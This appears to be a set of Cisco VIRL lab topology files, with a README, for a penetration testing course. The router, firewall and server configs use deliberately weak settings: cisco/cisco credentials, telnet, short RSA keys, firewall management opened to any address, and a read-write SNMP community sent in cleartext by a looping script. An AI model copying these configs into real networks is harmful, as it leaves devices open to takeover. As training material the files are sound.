/etc/ssh/sshd_config - echo "UseDNS no" &gt;&gt; /etc/ssh/sshd_config - service ssh restart - service sshd restart users: - default - gecos: User configured by VIRL Configuration Engine 0.23.10 lock-passwd: false name: cisco plain-text-passwd: cisco shell: /bin/bash ssh-authorized-keys: - VIRL-USER-SSH-PUBLIC-KEY sudo: ALL=(ALL) ALL write_files: - path: /etc/init/ttyS0.conf owner: root:root content: | # ttyS0 - getty # This service maintains a getty on ttyS0 from the point the system is # started until it is shut down again. start on stopped rc or RUNLEVEL=[12345] stop on runlevel [!12345] respawn exec /sbin/getty -L 115200 ttyS0 vt102 permissions: '0644' - path: /etc/systemd/system/[email protected] content: | [Unit] Description=Run dhclient on %i interface After=network.target [Service] Type=oneshot ExecStart=/sbin/dhclient %i -pf /var/run/dhclient.%i.pid -lf /var/lib/dhclient/dhclient.%i.lease RemainAfterExit=yes owner: root:root permissions: '0644' - path: /etc/rc.local owner: root:root permissions: '0755' content: |- #!/bin/sh ip route del default ip route add default via 172.16.1.2 ifconfig eth1 up 10.0.128.2 netmask 255.255.255.252 route add -host 192.168.0.1 gw 10.0.128.1 dev eth1 route add -host 192.168.0.4 gw 10.0.128.1 dev eth1 route add -net 10.0.0.0/17 gw 10.0.128.1 dev eth1 route add -net 10.0.128.0/30 gw 10.0.128.1 dev eth1 exit 0 - path: /home/cisco/snmp-chatter.sh content: | #!/bin/bash while true; do snmpget -v 2c -c supersecret 192.168.0.4 1.3.6.1.2.1.1.1.0 sleep 15 done owner: "cisco:cisco" permissions: '0755' </entry> </extensions> <interface id="0" name="eth1" ipv4="10.0.128.2" netPrefixLenV4="30"> <extensions> <entry key="AutoNetkit.vlan" type="Integer">3</entry> </extensions> </interface> </node> <node name="iosv-2" type="SIMPLE" subtype="IOSv" location="370,291" ipv4="192.168.0.4"> <extensions> <entry key="AutoNetkit.mgmt_ip" type="string"></entry> <entry key="config" type="String">! IOS Config generated on 2017-08-13 22:06 ! by autonetkit_0.23.5 ! hostname iosv-2 boot-start-marker boot-end-marker ! vrf definition Mgmt-intf ! address-family ipv4 exit-address-family ! address-family ipv6 exit-address-family ! ! ! no aaa new-model ! ! ip cef ipv6 unicast-routing ipv6 cef ! ! service timestamps debug datetime msec service timestamps log datetime msec no service password-encryption no service config enable password cisco ip classless ip subnet-zero no ip domain lookup ip domain name virl.info crypto key generate rsa modulus 768 ip ssh server algorithm authentication password username cisco privilege 15 secret cisco line vty 0 4 transport input ssh telnet exec-timeout 720 0 password cisco login local line con 0 password cisco ! no cdp run ! ! interface Loopback0 description Loopback ip address 192.168.0.4 255.255.255.255 ! interface GigabitEthernet0/0 description OOB Management vrf forwarding Mgmt-intf ! Configured on launch no ip address duplex full speed auto no shutdown ! interface GigabitEthernet0/1 description to iosvl2-1 ip address 10.0.0.3 255.255.128.0 ip ospf cost 1 duplex full speed auto no shutdown ! ! ! router ospf 1 network 192.168.0.4 0.0.0.0 area 0 log-adjacency-changes passive-interface Loopback0 network 10.0.0.0 0.0.127.255 area 0 ! ! router bgp 1 bgp router-id 192.168.0.4 no synchronization ! ibgp ! ibgp peers ! neighbor 192.168.0.1 remote-as 1 neighbor 192.168.0.1 description iBGP peer iosv-1 neighbor 192.168.0.1 update-source Loopback0 ! ! ! address-family ipv4 network 192.168.0.4 mask 255.255.255.255 neighbor 192.168.0.1 activate exit-address-family ! ! ip access-list standard snmp-managers permit 10.0.128.2 ! ! snmp-server community supersecret RW snmp-managers snmp-server chassis-id ! ! end</entry> </extensions> <interface id="0" name="GigabitEthernet0/1" ipv4="10.0.0.3" netPrefixLenV4="17"/> </node> <annotations/> <connection dst="/virl:topology/virl:node[2]/virl:interface[1]" src="/virl:topology/virl:node[1]/virl:interface[1]"/> <connection dst="/virl:topology/virl:node[1]/virl:interface[2]" src="/virl:topology/virl:node[4]/virl:interface[1]"/> <connection dst="/virl:topology/virl:node[4]/virl:interface[2]" src="/virl:topology/virl:node[2]/virl:interface[2]"/> <connection dst="/virl:topology/virl:node[1]/virl:interface[3]" src="/virl:topology/virl:node[3]/virl:interface[1]"/> <connection dst="/virl:topology/virl:node[2]/virl:interface[3]" src="/virl:topology/virl:node[5]/virl:interface[1]"/> <connection dst="/virl:topology/virl:node[6]/virl:interface[1]" src="/virl:topology/virl:node[1]/virl:interface[4]"/> </topology>
h4cker/virl_topologies/8.9.virl
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <topology xmlns="http://www.cisco.com/VIRL" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" schemaVersion="0.95" xsi:schemaLocation="http://www.cisco.com/VIRL https://raw.github.com/CiscoVIRL/schema/v0.95/virl.xsd"> <extensions> <entry key="AutoNetkit.infrastructure_only" type="Boolean">false</entry> <entry key="management_network" type="String">flat</entry> <entry key="AutoNetkit.enable_cdp" type="Boolean">true</entry> <entry key="AutoNetkit.IGP" type="String">rip-v2</entry> </extensions> <node name="iosvl2-1" type="SIMPLE" subtype="IOSvL2" location="296,180"> <extensions> <entry key="config" type="string">! IOSvL2 Config generated on 2017-08-27 14:56 ! by autonetkit_0.23.5 ! version 15.2 service timestamps debug datetime msec service timestamps log datetime msec no service password-encryption service compress-config no service config enable password cisco ip classless ip subnet-zero no ip domain lookup ! line vty 0 4 transport input ssh telnet exec-timeout 720 0 password cisco login ! line con 0 password cisco ! hostname iosvl2-1 ! boot-start-marker boot-end-marker ! ! ! no aaa new-model ! vtp domain virl.lab vtp mode transparent ! vlan 2 name ank_vlan2 vlan 3 name ank_vlan3 ! ! ! ! cdp run ! ! ! ip cef no ipv6 cef ! ! spanning-tree mode pvst spanning-tree extend system-id ! vlan internal allocation policy ascending ! ! ! ! vrf definition Mgmt-intf ! address-family ipv4 exit-address-family ! address-family ipv6 exit-address-family ! ! ! ! ! interface Loopback0 description Loopback ! interface GigabitEthernet0/0 description OOB management ! Configured on launch no switchport vrf forwarding Mgmt-intf no ip address no shutdown ! interface GigabitEthernet0/1 description to iosvl2-2 switchport trunk encapsulation dot1q switchport mode trunk no shutdown ! interface GigabitEthernet0/2 description to iosv-1 switchport access vlan 2 switchport mode access no shutdown ! interface GigabitEthernet0/3 description to kali-1 switchport access vlan 2 switchport mode access no shutdown ! interface GigabitEthernet1/0 description to iosv-2 switchport access vlan 2 switchport mode access no shutdown ! ! ip forward-protocol nd ! no ip http server no ip http secure-server ! ! ! ! ! ! control-plane ! ! ! end </entry> <entry key="AutoNetkit.mgmt_ip" type="string"></entry> </extensions> <interface id="0" name="GigabitEthernet0/1"/> <interface id="1" name="GigabitEthernet0/2"/> <interface id="2" name="GigabitEthernet0/3"/> <interface id="3" name="GigabitEthernet1/0"/> </node> <node name="iosvl2-2" type="SIMPLE" subtype="IOSvL2" location="520,177"> <extensions> <entry key="config" type="string">! IOSvL2 Config generated on 2017-08-27 14:56 ! by autonetkit_0.23.5 ! version 15.2 service timestamps debug datetime msec service timestamps log datetime msec no service password-encryption service compress-config no service config enable password cisco ip classless ip subnet-zero no ip domain lookup ! line vty 0 4 transport input ssh telnet exec-timeout 720 0 password cisco login ! line con 0 password cisco ! hostname iosvl2-2 ! boot-start-marker boot-end-marker ! ! ! no aaa new-model ! vtp domain virl.lab vtp mode transparent ! vlan 2 name ank_vlan2 vlan 3 name ank_vlan3 ! ! ! ! cdp run ! ! ! ip cef no ipv6 cef ! ! spanning-tree mode pvst spanning-tree extend system-id ! vlan internal allocation policy ascending ! ! ! ! vrf definition Mgmt-intf ! address-family ipv4 exit-address-family ! address-family ipv6 exit-address-family ! ! ! ! ! interface Loopback0 description Loopback ! interface GigabitEthernet0/0 description OOB management ! Configured on launch no switchport vrf forwarding Mgmt-intf no ip address no shutdown ! interface GigabitEthernet0/1 description to iosvl2-1 switchport trunk encapsulation dot1q switchport mode trunk no shutdown ! interface GigabitEthernet0/2 description to iosv-1 switchport access vlan 3 switchport mode access no shutdown ! interface GigabitEthernet0/3 description to server-1 switchport access vlan 3 switchport mode access no shutdown ! ! ip forward-protocol nd ! no ip http server no ip http secure-server ! ! ! ! ! ! control-plane ! ! ! end </entry> <entry key="AutoNetkit.mgmt_ip" type="string"></entry> </extensions> <interface id="0" name="GigabitEthernet0/1"/> <interface id="1" name="GigabitEthernet0/2"/> <interface id="2" name="GigabitEthernet0/3"/> </node> <node name="kali-1" type="SIMPLE" subtype="kali" location="193,282"> <extensions> <entry key="config" type="String">#cloud-config bootcmd: - ln -s -t /etc/rc.d /etc/rc.local hostname: kali-1 manage_etc_hosts: true package_update: true packages: - quagga runcmd: - start ttyS0 - systemctl start [email protected] - systemctl start rc-local - sed -i '/^\s*PasswordAuthentication\s\+no/d' /etc/ssh/sshd_config - echo "UseDNS no" &gt;&gt; /etc/ssh/sshd_config - service ssh restart - service sshd restart users: - default - gecos: User configured by VIRL Configuration Engine 0.23.10 lock-passwd: false name: cisco plain-text-passwd: cisco shell: /bin/bash ssh-authorized-keys: - VIRL-USER-SSH-PUBLIC-KEY sudo: ALL=(ALL) ALL write_files: - path: /etc/init/ttyS0.conf owner: root:root content: | # ttyS0 - getty # This service maintains a getty on ttyS0 from the point the system is # started until it is shut down again. start on stopped rc or RUNLEVEL=[12345] stop on runlevel [!12345] respawn exec /sbin/getty -L 115200 ttyS0 vt102 permissions: '0644' - path: /etc/systemd/system/[email protected] content: | [Unit] Description=Run dhclient on %i interface After=network.target [Service] Type=oneshot ExecStart=/sbin/dhclient %i -pf /var/run/dhclient.%i.pid -lf /var/lib/dhclient/dhclient.%i.lease RemainAfterExit=yes owner: root:root permissions: '0644' - path: /etc/rc.local owner: root:root permissions: '0755' content: |- #!/bin/sh ip route del default ip route add default via 172.16.1.2 ip link set eth1 up ip addr add 10.0.0.1/17 dev eth1 # Use routes from Quagga instead #route add -host 192.168.0.1 gw 10.0.0.2 dev eth1 #route add -host 192.168.0.4 gw 10.0.0.2 dev eth1 #route add -net 10.0.0.0/17 gw 10.0.0.2 dev eth1 #route add -net 10.0.128.0/30 gw 10.0.0.2 dev eth1 #route add -host 192.168.0.1 gw 10.0.0.3 dev eth1 #route add -host 192.168.0.4 gw 10.0.0.3 dev eth1 #route add -net 10.0.0.0/17 gw 10.0.0.3 dev eth1 #route add -net 10.0.128.0/30 gw 10.0.0.3 dev eth1 exit 0 - path: /etc/quagga/zebra.conf owner: root:root permissions: '0644' content: |- hostname kali-1 password cisco enable password cisco interface eth0 interface eth1 line vty - path: /etc/quagga/ripd.conf owner: root:root permissions: '0644' content: |- hostname kali-1 password cisco log stdout router rip network eth1 line vty </entry> </extensions> <interface id="0" name="eth1" ipv4="10.0.0.1" netPrefixLenV4="17"> <extensions> <entry key="AutoNetkit.vlan" type="Integer">2</entry> </extensions> </interface> </node> <node name="iosv-1" type="SIMPLE" subtype="IOSv" location="417,76" ipv4="192.168.0.1"> <extensions> <entry key="config" type="string">! IOS Config generated on 2017-08-27 14:56 ! by autonetkit_0.23.5 ! hostname iosv-1 boot-start-marker boot-end-marker ! vrf definition Mgmt-intf ! address-family ipv4 exit-address-family ! address-family ipv6 exit-address-family ! ! ! no aaa new-model ! ! ip cef ipv6 unicast-routing ipv6 cef ! ! service timestamps debug datetime msec service timestamps log datetime msec no service password-encryption no service config enable password cisco ip classless ip subnet-zero no ip domain lookup ip domain name virl.info crypto key generate rsa modulus 768 ip ssh server algorithm authentication password username cisco privilege 15 secret cisco line vty 0 4 transport input ssh telnet exec-timeout 720 0 password cisco login local line con 0 password cisco ! cdp run ! ! interface Loopback0 description Loopback ip address 192.168.0.1 255.255.255.255 ! interface GigabitEthernet0/0 description OOB Management vrf forwarding Mgmt-intf ! Configured on launch no ip address cdp enable duplex full speed auto no shutdown ! interface GigabitEthernet0/1 description to iosvl2-1 ip address 10.0.0.2 255.255.128.0 cdp enable duplex full speed auto no shutdown ! interface GigabitEthernet0/2 description to iosvl2-2 ip address 10.0.128.1 255.255.255.252 cdp enable duplex full speed auto no shutdown ! ! ! router rip version 2 no auto-summary network 10.0.0.0 network 10.0.128.0 network 192.168.0.1 passive-interface GigabitEthernet0/0 ! ! router bgp 1 bgp router-id 192.168.0.1 no synchronization ! ibgp ! ibgp peers ! neighbor 192.168.0.4 remote-as 1 neighbor 192.168.0.4 description iBGP peer iosv-2 neighbor 192.168.0.4 update-source Loopback0 ! ! ! address-family ipv4 network 192.168.0.1 mask 255.255.255.255 neighbor 192.168.0.4 activate exit-address-family ! ! ! end</entry> <entry key="AutoNetkit.mgmt_ip" type="string"></entry> </extensions> <interface id="0" name="GigabitEthernet0/1" ipv4="10.0.0.2" netPrefixLenV4="17"> <extensions> <entry key="AutoNetkit.vlan" type="Integer">2</entry> </extensions> </interface> <interface id="1" name="GigabitEthernet0/2" ipv4="10.0.128.1" netPrefixLenV4="30"> <extensions> <entry key="AutoNetkit.vlan" type="Integer">3</entry> </extensions> </interface> </node> <node name="server-1" type="SIMPLE" subtype="server" location="592,287"> <extensions> <entry key="config" type="string">#cloud-config bootcmd: - ln -s -t /etc/rc.d /etc/rc.local hostname: server-1 manage_etc_hosts: true runcmd: - start ttyS0 - systemctl start [email protected] - systemctl start rc-local - sed -i '/^\s*PasswordAuthentication\s\+no/d' /etc/ssh/sshd_config - echo "UseDNS no" &gt;&gt; /etc/ssh/sshd_config - service ssh restart - service sshd restart users: - default - gecos: User configured by VIRL Configuration Engine 0.23.10 lock-passwd: false name: cisco plain-text-passwd: cisco shell: /bin/bash ssh-authorized-keys: - VIRL-USER-SSH-PUBLIC-KEY sudo: ALL=(ALL) ALL write_files: - path: /etc/init/ttyS0.conf owner: root:root content: | # ttyS0 - getty # This service maintains a getty on ttyS0 from the point the system is # started until it is shut down again. start on stopped rc or RUNLEVEL=[12345] stop on runlevel [!12345] respawn exec /sbin/getty -L 115200 ttyS0 vt102 permissions: '0644' - path: /etc/systemd/system/[email protected] content: | [Unit] Description=Run dhclient on %i interface After=network.target [Service] Type=oneshot ExecStart=/sbin/dhclient %i -pf /var/run/dhclient.%i.pid -lf /var/lib/dhclient/dhclient.%i.lease RemainAfterExit=yes owner: root:root permissions: '0644' - path: /etc/rc.local owner: root:root permissions: '0755' content: |- #!/bin/sh ifconfig eth1 up 10.0.128.2 netmask 255.255.255.252 route add -host 192.168.0.1 gw 10.0.128.1 dev eth1 route add -host 192.168.0.4 gw 10.0.128.1 dev eth1 route add -net 10.0.0.0/17 gw 10.0.128.1 dev eth1 route add -net 10.0.128.0/30 gw 10.0.128.1 dev eth1 exit 0 </entry> </extensions> <interface id="0" name="eth1" ipv4="10.0.128.2" netPrefixLenV4="30"> <extensions> <entry key="AutoNetkit.vlan" type="Integer">3</entry> </extensions> </interface> </node> <node name="iosv-2" type="SIMPLE" subtype="IOSv" location="370,291" ipv4="192.168.0.4"> <extensions> <entry key="AutoNetkit.mgmt_ip" type="string"></entry> <entry key="config" type="String">! IOS Config generated on 2017-08-27 14:56 ! by autonetkit_0.23.5 ! hostname iosv-2 boot-start-marker boot-end-marker ! vrf definition Mgmt-intf ! address-family ipv4 exit-address-family ! address-family ipv6 exit-address-family ! ! ! no aaa new-model ! ! ip cef ipv6 unicast-routing ipv6 cef ! ! service timestamps debug datetime msec service timestamps log datetime msec no service password-encryption no service config enable password cisco ip classless ip subnet-zero no ip domain lookup ip domain name virl.info crypto key generate rsa modulus 768 ip ssh server algorithm authentication password username cisco privilege 15 secret cisco ip access-list standard IN-VTY permit 172.16.1.0 0.0.0.255 permit 192.168.0.0 0.0.0.255 permit 10.0.128.0 0.0.0.3 line vty 0 4 transport input ssh telnet access-class IN-VTY in vrf-also exec-timeout 720 0 password cisco login local line con 0 password cisco ! cdp run ! ! interface Loopback0 description Loopback ip address 192.168.0.4 255.255.255.255 ! interface GigabitEthernet0/0 description OOB Management vrf forwarding Mgmt-intf ! Configured on launch no ip address cdp enable duplex full speed auto no shutdown ! interface GigabitEthernet0/1 description to iosvl2-1 ip address 10.0.0.3 255.255.128.0 cdp enable duplex full speed auto no shutdown ! ! ! router rip version 2 no auto-summary network 10.0.0.0 network 192.168.0.4 passive-interface GigabitEthernet0/0 ! ! router bgp 1 bgp router-id 192.168.0.4 no synchronization ! ibgp ! ibgp peers ! neighbor 192.168.0.1 remote-as 1 neighbor 192.168.0.1 description iBGP peer iosv-1 neighbor 192.168.0.1 update-source Loopback0 ! ! ! address-family ipv4 network 192.168.0.4 mask 255.255.255.255 neighbor 192.168.0.1 activate exit-address-family ! ! ! end</entry> </extensions> <interface id="0" name="GigabitEthernet0/1" ipv4="10.0.0.3" netPrefixLenV4="17"> <extensions> <entry key="AutoNetkit.vlan" type="Integer">2</entry> </extensions> </interface> </node> <annotations/> <connection dst="/virl:topology/virl:node[2]/virl:interface[1]" src="/virl:topology/virl:node[1]/virl:interface[1]"/> <connection dst="/virl:topology/virl:node[1]/virl:interface[2]" src="/virl:topology/virl:node[4]/virl:interface[1]"/> <connection dst="/virl:topology/virl:node[4]/virl:interface[2]" src="/virl:topology/virl:node[2]/virl:interface[2]"/> <connection dst="/virl:topology/virl:node[1]/virl:interface[3]" src="/virl:topology/virl:node[3]/virl:interface[1]"/> <connection dst="/virl:topology/virl:node[2]/virl:interface[3]" src="/virl:topology/virl:node[5]/virl:interface[1]"/> <connection dst="/virl:topology/virl:node[6]/virl:interface[1]" src="/virl:topology/virl:node[1]/virl:interface[4]"/> </topology>
Markdown
h4cker/virl_topologies/README.md
# VIRL Topologies This folder includes the Virtual Internet Routing Lab Personal Edition (VIRL PE) topologies used in [The security penetration testing (the art of hacking series) video course](https://www.safaribooksonline.com/library/view/security-penetration-testing/9780134833989/sptt_00_08_07_00.html). [VIRL](http://get.virl.info/) is a powerful network virtualization and orchestration platform that enables the development of highly accurate models of existing or planned networks.
h4cker/virl_topologies/new_topo/art_of_hacking_1.virl
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <topology xmlns="http://www.cisco.com/VIRL" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" schemaVersion="0.95" xsi:schemaLocation="http://www.cisco.com/VIRL https://raw.github.com/CiscoVIRL/schema/v0.95/virl.xsd"> <node name="iosv-1" type="SIMPLE" subtype="IOSv" location="301,221" ipv4="192.168.0.3"> <extensions> <entry key="config" type="string">! IOS Config generated on 2018-06-02 05:15 ! by autonetkit_0.24.0 ! hostname iosv-1 boot-start-marker boot-end-marker ! vrf definition Mgmt-intf ! address-family ipv4 exit-address-family ! address-family ipv6 exit-address-family ! ! ! no aaa new-model ! ! ip cef ipv6 unicast-routing ipv6 cef ! ! service timestamps debug datetime msec service timestamps log datetime msec no service password-encryption no service config enable password cisco ip classless ip subnet-zero no ip domain lookup ip domain name virl.info crypto key generate rsa modulus 768 ip ssh server algorithm authentication password username cisco privilege 15 secret cisco line vty 0 4 transport input ssh telnet exec-timeout 720 0 password cisco login local line con 0 password cisco ! no cdp run ! ! interface Loopback0 description Loopback ip address 192.168.0.3 255.255.255.255 ! interface GigabitEthernet0/0 description OOB Management vrf forwarding Mgmt-intf ! Configured on launch no ip address duplex full speed auto no shutdown ! interface GigabitEthernet0/1 description to server-1 ip address 10.0.0.5 255.255.255.252 ip ospf cost 1 duplex full speed auto no shutdown ! interface GigabitEthernet0/2 description to iosv-4 ip address 10.0.0.17 255.255.255.252 ip ospf cost 1 duplex full speed auto no shutdown ! ! ! router ospf 1 network 192.168.0.3 0.0.0.0 area 0 log-adjacency-changes passive-interface Loopback0 network 10.0.0.4 0.0.0.3 area 0 network 10.0.0.16 0.0.0.3 area 0 ! ! router bgp 1 bgp router-id 192.168.0.3 no synchronization ! ibgp ! ibgp peers ! neighbor 192.168.0.4 remote-as 1 neighbor 192.168.0.4 description iBGP peer iosv-2 neighbor 192.168.0.4 update-source Loopback0 ! neighbor 192.168.0.7 remote-as 1 neighbor 192.168.0.7 description iBGP peer iosv-3 neighbor 192.168.0.7 update-source Loopback0 ! neighbor 192.168.0.8 remote-as 1 neighbor 192.168.0.8 description iBGP peer iosv-4 neighbor 192.168.0.8 update-source Loopback0 ! ! ! address-family ipv4 network 192.168.0.3 mask 255.255.255.255 neighbor 192.168.0.4 activate neighbor 192.168.0.7 activate neighbor 192.168.0.8 activate exit-address-family ! ! ! end</entry> <entry key="AutoNetkit.mgmt_ip" type="string"></entry> </extensions> <interface id="0" name="GigabitEthernet0/1" ipv4="10.0.0.5" netPrefixLenV4="30"/> <interface id="1" name="GigabitEthernet0/2" ipv4="10.0.0.17" netPrefixLenV4="30"/> </node> <node name="iosv-2" type="SIMPLE" subtype="IOSv" location="306,368" ipv4="192.168.0.4"> <extensions> <entry key="config" type="string">! IOS Config generated on 2018-06-02 05:15 ! by autonetkit_0.24.0 ! hostname iosv-2 boot-start-marker boot-end-marker ! vrf definition Mgmt-intf ! address-family ipv4 exit-address-family ! address-family ipv6 exit-address-family ! ! ! no aaa new-model ! ! ip cef ipv6 unicast-routing ipv6 cef ! ! service timestamps debug datetime msec service timestamps log datetime msec no service password-encryption no service config enable password cisco ip classless ip subnet-zero no ip domain lookup ip domain name virl.info crypto key generate rsa modulus 768 ip ssh server algorithm authentication password username cisco privilege 15 secret cisco line vty 0 4 transport input ssh telnet exec-timeout 720 0 password cisco login local line con 0 password cisco ! no cdp run ! ! interface Loopback0 description Loopback ip address 192.168.0.4 255.255.255.255 ! interface GigabitEthernet0/0 description OOB Management vrf forwarding Mgmt-intf ! Configured on launch no ip address duplex full speed auto no shutdown ! interface GigabitEthernet0/1 description to server-2 ip address 10.0.0.21 255.255.255.252 ip ospf cost 1 duplex full speed auto no shutdown ! interface GigabitEthernet0/2 description to iosv-4 ip address 10.0.0.25 255.255.255.252 ip ospf cost 1 duplex full speed auto no shutdown ! ! ! router ospf 1 network 192.168.0.4 0.0.0.0 area 0 log-adjacency-changes passive-interface Loopback0 network 10.0.0.20 0.0.0.3 area 0 network 10.0.0.24 0.0.0.3 area 0 ! ! router bgp 1 bgp router-id 192.168.0.4 no synchronization ! ibgp ! ibgp peers ! neighbor 192.168.0.3 remote-as 1 neighbor 192.168.0.3 description iBGP peer iosv-1 neighbor 192.168.0.3 update-source Loopback0 ! neighbor 192.168.0.7 remote-as 1 neighbor 192.168.0.7 description iBGP peer iosv-3 neighbor 192.168.0.7 update-source Loopback0 ! neighbor 192.168.0.8 remote-as 1 neighbor 192.168.0.8 description iBGP peer iosv-4 neighbor 192.168.0.8 update-source Loopback0 ! ! ! address-family ipv4 network 192.168.0.4 mask 255.255.255.255 neighbor 192.168.0.3 activate neighbor 192.168.0.7 activate neighbor 192.168.0.8 activate exit-address-family ! ! ! end</entry> <entry key="AutoNetkit.mgmt_ip" type="string"></entry> </extensions> <interface id="0" name="GigabitEthernet0/1" ipv4="10.0.0.21" netPrefixLenV4="30"/> <interface id="1" name="GigabitEthernet0/2" ipv4="10.0.0.25" netPrefixLenV4="30"/> </node> <node name="iosv-3" type="SIMPLE" subtype="IOSv" location="678,276" ipv4="192.168.0.7"> <extensions> <entry key="config" type="string">! IOS Config generated on 2018-06-02 05:15 ! by autonetkit_0.24.0 ! hostname iosv-3 boot-start-marker boot-end-marker ! vrf definition Mgmt-intf ! address-family ipv4 exit-address-family ! address-family ipv6 exit-address-family ! ! ! no aaa new-model ! ! ip cef ipv6 unicast-routing ipv6 cef ! ! service timestamps debug datetime msec service timestamps log datetime msec no service password-encryption no service config enable password cisco ip classless ip subnet-zero no ip domain lookup ip domain name virl.info crypto key generate rsa modulus 768 ip ssh server algorithm authentication password username cisco privilege 15 secret cisco line vty 0 4 transport input ssh telnet exec-timeout 720 0 password cisco login local line con 0 password cisco ! no cdp run ! ! interface Loopback0 description Loopback ip address 192.168.0.7 255.255.255.255 ! interface GigabitEthernet0/0 description OOB Management vrf forwarding Mgmt-intf ! Configured on launch no ip address duplex full speed auto no shutdown ! interface GigabitEthernet0/1 description to asav-1 ip address 10.0.0.10 255.255.255.252 ip ospf cost 1 duplex full speed auto no shutdown ! interface GigabitEthernet0/2 description to server-3 ip address 10.0.0.29 255.255.255.252 ip ospf cost 1 duplex full speed auto no shutdown ! ! ! router ospf 1 network 192.168.0.7 0.0.0.0 area 0 log-adjacency-changes passive-interface Loopback0 network 10.0.0.8 0.0.0.3 area 0 network 10.0.0.28 0.0.0.3 area 0 ! ! router bgp 1 bgp router-id 192.168.0.7 no synchronization ! ibgp ! ibgp peers ! neighbor 192.168.0.3 remote-as 1 neighbor 192.168.0.3 description iBGP peer iosv-1 neighbor 192.168.0.3 update-source Loopback0 ! neighbor 192.168.0.4 remote-as 1 neighbor 192.168.0.4 description iBGP peer iosv-2 neighbor 192.168.0.4 update-source Loopback0 ! neighbor 192.168.0.8 remote-as 1 neighbor 192.168.0.8 description iBGP peer iosv-4 neighbor 192.168.0.8 update-source Loopback0 ! ! ! address-family ipv4 network 192.168.0.7 mask 255.255.255.255 neighbor 192.168.0.3 activate neighbor 192.168.0.4 activate neighbor 192.168.0.8 activate exit-address-family ! ! ! end</entry> <entry key="AutoNetkit.mgmt_ip" type="string"></entry> </extensions> <interface id="0" name="GigabitEthernet0/1" ipv4="10.0.0.10" netPrefixLenV4="30"/> <interface id="1" name="GigabitEthernet0/2" ipv4="10.0.0.29" netPrefixLenV4="30"/> </node> <node name="asav-1" type="SIMPLE" subtype="ASAv" location="543,274"> <extensions> <entry key="config" type="string">! ASAv Config generated on 2018-06-02 05:15 ! by autonetkit_0.24.0 ! hostname asav-1 username cisco password cisco privilege 15 enable password cisco passwd cisco names ! interface GigabitEthernet0/0 description to iosv-4 duplex full nameif outside security-level 0 no shutdown ip address 10.0.0.13 255.255.255.252 interface GigabitEthernet0/1 description to iosv-3 duplex full nameif outside-1 security-level 0 no shutdown ip address 10.0.0.9 255.255.255.252 interface Management0/0 description OOB Management duplex full management-only nameif mgmt security-level 100 no shutdown ! Configured on launch no ip address ! same-security-traffic permit inter-interface logging enable logging asdm informational user-identity default-domain LOCAL aaa authentication ssh console LOCAL http server enable http 0.0.0.0 0.0.0.0 mgmt ssh 0.0.0.0 0.0.0.0 mgmt telnet 0.0.0.0 0.0.0.0 mgmt http 0.0.0.0 0.0.0.0 outside ssh 0.0.0.0 0.0.0.0 outside telnet 0.0.0.0 0.0.0.0 outside http 0.0.0.0 0.0.0.0 outside-1 ssh 0.0.0.0 0.0.0.0 outside-1 telnet 0.0.0.0 0.0.0.0 outside-1 ssh version 2 crypto key generate rsa modulus 768 telnet timeout 15 console timeout 0 username cisco password cisco privilege 15 ! class-map inspection_default match default-inspection-traffic ! ! policy-map type inspect dns preset_dns_map parameters message-length maximum client auto message-length maximum 512 policy-map global_policy class inspection_default inspect ip-options inspect netbios inspect rtsp inspect sunrpc inspect tftp inspect xdmcp inspect dns preset_dns_map inspect ftp inspect h323 h225 inspect h323 ras inspect rsh inspect esmtp inspect sqlnet inspect sip inspect skinny inspect icmp inspect http ! service-policy global_policy global no call-home reporting anonymous call-home profile CiscoTAC-1 no active end </entry> <entry key="AutoNetkit.mgmt_ip" type="string"></entry> </extensions> <interface id="0" name="GigabitEthernet0/0" ipv4="10.0.0.13" netPrefixLenV4="30"/> <interface id="1" name="GigabitEthernet0/1" ipv4="10.0.0.9" netPrefixLenV4="30"/> </node> <node name="server-1" type="SIMPLE" subtype="server" location="181,216"> <extensions> <entry key="config" type="string">#cloud-config bootcmd: - ln -s -t /etc/rc.d /etc/rc.local hostname: server-1 manage_etc_hosts: true runcmd: - start ttyS0 - systemctl start [email protected] - systemctl start rc-local - sed -i '/^\s*PasswordAuthentication\s\+no/d' /etc/ssh/sshd_config - echo "UseDNS no" &gt;&gt; /etc/ssh/sshd_config - service ssh restart - service sshd restart users: - default - gecos: User configured by VIRL Configuration Engine 0.23.10 lock-passwd: false name: cisco plain-text-passwd: cisco shell: /bin/bash ssh-authorized-keys: - VIRL-USER-SSH-PUBLIC-KEY sudo: ALL=(ALL) ALL write_files: - path: /etc/init/ttyS0.conf owner: root:root content: | # ttyS0 - getty # This service maintains a getty on ttyS0 from the point the system is # started until it is shut down again. start on stopped rc or RUNLEVEL=[12345] stop on runlevel [!12345] respawn exec /sbin/getty -L 115200 ttyS0 vt102 permissions: '0644' - path: /etc/systemd/system/[email protected] content: | [Unit] Description=Run dhclient on %i interface After=network.target [Service] Type=oneshot ExecStart=/sbin/dhclient %i -pf /var/run/dhclient.%i.pid -lf /var/lib/dhclient/dhclient.%i.lease RemainAfterExit=yes owner: root:root permissions: '0644' - path: /etc/rc.local owner: root:root permissions: '0755' content: |- #!/bin/sh ifconfig eth1 up 10.0.0.6 netmask 255.255.255.252 route add -net 10.0.0.0/8 gw 10.0.0.5 dev eth1 route add -net 192.168.0.0/28 gw 10.0.0.5 dev eth1 exit 0 </entry> </extensions> <interface id="0" name="eth1" ipv4="10.0.0.6" netPrefixLenV4="30"/> </node> <node name="server-2" type="SIMPLE" subtype="server" location="178,366"> <extensions> <entry key="config" type="string">#cloud-config bootcmd: - ln -s -t /etc/rc.d /etc/rc.local hostname: server-2 manage_etc_hosts: true runcmd: - start ttyS0 - systemctl start [email protected] - systemctl start rc-local - sed -i '/^\s*PasswordAuthentication\s\+no/d' /etc/ssh/sshd_config - echo "UseDNS no" &gt;&gt; /etc/ssh/sshd_config - service ssh restart - service sshd restart users: - default - gecos: User configured by VIRL Configuration Engine 0.23.10 lock-passwd: false name: cisco plain-text-passwd: cisco shell: /bin/bash ssh-authorized-keys: - VIRL-USER-SSH-PUBLIC-KEY sudo: ALL=(ALL) ALL write_files: - path: /etc/init/ttyS0.conf owner: root:root content: | # ttyS0 - getty # This service maintains a getty on ttyS0 from the point the system is # started until it is shut down again. start on stopped rc or RUNLEVEL=[12345] stop on runlevel [!12345] respawn exec /sbin/getty -L 115200 ttyS0 vt102 permissions: '0644' - path: /etc/systemd/system/[email protected] content: | [Unit] Description=Run dhclient on %i interface After=network.target [Service] Type=oneshot 